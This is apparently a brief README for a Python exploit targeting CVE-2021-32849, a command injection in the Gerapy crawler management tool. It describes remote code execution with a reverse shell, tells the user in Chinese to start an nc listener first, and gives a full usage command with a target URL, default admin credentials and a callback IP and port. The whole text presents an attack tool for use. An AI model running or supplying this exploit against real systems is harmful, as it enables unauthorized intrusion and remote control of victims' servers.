
Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell.
cve-2021-32849(gerapy命令执行)
先开启一个nc进行监听,再用exp去打
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id
